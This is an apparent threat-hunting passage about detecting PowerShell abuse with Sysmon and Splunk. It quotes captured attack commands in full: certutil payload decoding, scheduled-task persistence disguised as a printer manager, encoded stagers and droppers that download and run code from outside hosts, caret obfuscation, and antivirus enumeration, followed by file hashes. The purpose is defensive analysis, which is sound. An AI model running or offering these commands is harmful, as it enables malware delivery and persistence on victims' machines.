MAawBzAC4AZQB4AGUAIAAvAGMAcgBlAGEAdABlACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADMAIgAgAC8AWABNAEwAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADMALgB4AG0AbAAiACkACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwANAAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANAAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAA1AC4AeABtAGwAIgApAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADEAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AcgB1AG4AIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMwAiAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADQAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAAqAC4AeABtAGwAIgApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUA
Following command, use the 'certutil' to create a binary file which it is later executed, as showed below:
$loot = ($env:LOCALAPPDATA + "\dyna\"); md $loot certutil -decode res.crt ($loot + "res"); certutil -decode kl.crt ($loot + "kl.exe"); certutil -decode st.crt ($loot + "st.exe"); certutil -decode cry.crt ($loot + "cry.exe"); certutil -decode t1.crt ($env:TEMP + "\t1.xml"); certutil -decode t2.crt ($env:TEMP + "\t2.xml"); certutil -decode t3.crt ($env:TEMP + "\t3.xml"); certutil -decode t4.crt ($env:TEMP + "\t4.xml"); certutil -decode t5.crt ($env:TEMP + "\t5.xml"); certutil -decode bd.crt C:\ProgramData\bd.exe schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\1" /XML ($env:TEMP + "\t1.xml") schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\2" /XML ($env:TEMP + "\t2.xml") schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\3" /XML ($env:TEMP + "\t3.xml") schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\4" /XML ($env:TEMP + "\t4.xml") schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\5" /XML ($env:TEMP + "\t5.xml") schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\1" schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\2" schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\3" schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\4" schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\5" Remove-Item ..
"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBhADMAZgA1ADcAM.....CQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=
Next one in the list is quite interesting as well. It uses some of the functions in in .NET framework to load additional code.
$x='a3f57212-1462-4ae7-8745-5e178820d04c';$y='Z:\tmp\0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE } catch [NotSupportedException] { Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red } catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAcwBUAGUATQAuAE4AZQB0AC4AUwBFAFIAdgBpAEMAZQBQAG8AaQBOAHQATQBBAE4AQQBHAEUAUgBdADoAOgBFAHgAUABFAEMAdAAxADAAMABDAG8ATgB0AGkATgB1AEUAIAA9ACAAMAA7ACQAdwBDAD0ATgBlAHcALQBPAGIASgBlAEMAdAAgAFMAWQBzAHQARQBtAC4ATgBlAFQALgBXAGUAYgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBlAFQALgBXAGUAYgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQARQBmAEEAVQBsAHQAVwBFAEIAUAByAE8AWABZADsAJABXAGMALgBQAFIATwBYAHkALgBDAHIARQBEAGUAbgBUAGkAQQBMAFMAIAA9ACAAWwBTAHkAcwB0AEUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABJAEEATABDAEEAYwBoAEUAXQA6ADoARABlAEYAQQB1AGwAVABOAGUAdAB3AG8AUgBLAEMAUgBlAGQARQBuAHQASQBBAGwAUwA7ACQASwA9ACcAdQApADEALAB5ACgAbQBqAGYAYQAqAEUANQAjADIATABPADMAfQA5AGgANgBjAC0AegBJAHgAXQBpAG8AawAlACcAOwAkAGkAPQAwADsAWwBjAGgAQQBSAFsAXQBdACQAQgA9ACgAWwBDAEgAQQByAFsAXQBdACgAJAB3AGMALgBEAG8AdwBOAEwAbwBBAEQAUwB0AFIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMwA4AC4AMQAwADAALgAxADYAMwAuADMAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAHIAJABrAFsAJABJACsAKwAlACQAawAuAEwAZQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBuACcAJwApAA==
[SYsTeM.Net.SERviCePoiNtMANAGER]::ExPECt100CoNtiNuE = 0;$wC=New-ObJeCt SYstEm.NeT.WebCliENt; $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADeRs.AdD('User-Agent',$u);$wC.PrOxy = [SySTeM.NeT.WebRequESt]::DEfAUltWEBPrOXY;$Wc.PROXy.CrEDenTiALS = [SystEm.NEt.CREdEnTIALCAchE]::DeFAulTNetwoRKCRedEntIAlS;$K='u)1,y(mjfa*E5#2LO3}9h6c-zIx]iok%';$i=0;[chAR[]]$B=([CHAr[]] ($wc.DowNLoADStRing("http://38.100.163.39:8080/index.asp")))|%{$_-BXOr$k[$I++%$k.LenGTH]};IEX ($B-join''
powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
This PowerShell command acts as dropper. It is interesting to check the ParentProcessCommand as it using the character "^" to avoid detection,
"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
The last command detects if there is Antivirus/Antispyware installed and running
powershell.exe -inputformat none -NoProfile -NoLogo -Command "& {$avlist = @(); $os = Get-WmiObject Win32_OperatingSystem; if ($os.ProductType -eq 3) {Write-Host \"ServerOS|0\";} elseif ($os.Version -like \"5.*\") {Get-WmiObject -Namespace root\SecurityCenter -Class AntiVirusProduct | ForEach-Object {Write-Host \"$($_.displayName)|$(if ($_.onAccessScanningEnabled) {\"4096\"} else {\"0\"})\"};} else {Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiSpywareProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};} Write-Host ($avlist -join \"*\")}"
As showed, PowerShell can be abused in many different ways through the different phases of an intrusion, therefore it is very important to monitor suspicious PowerShell commands, and Sysmonitor+Splunk can really help on this purpose.
Indicators:
a64b9215aff8a71333e9a5df5cd3b371b6b0a6d6a44604a93f0ba928c4f60d8d
91746786d3db211a33bfb851029cb3b42224cbc1d01f8b45d8ab4d6ef872ab81
9d3b4f233a61322d9738700f9e42b729a160fe651167e8454a25fbc74e4cf9ef
573301614d192de0ac34754e73c9f4ad036db318326421b66eb9fb394c7d3298
0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4
64aac1af18109e6661fb86a52c4024f81ef761818651897cde47eb71d8825de9
6d57ecd0b30fd27b793120ba16c208e58a986961fa0afc9c603b06b9ef66f7d9
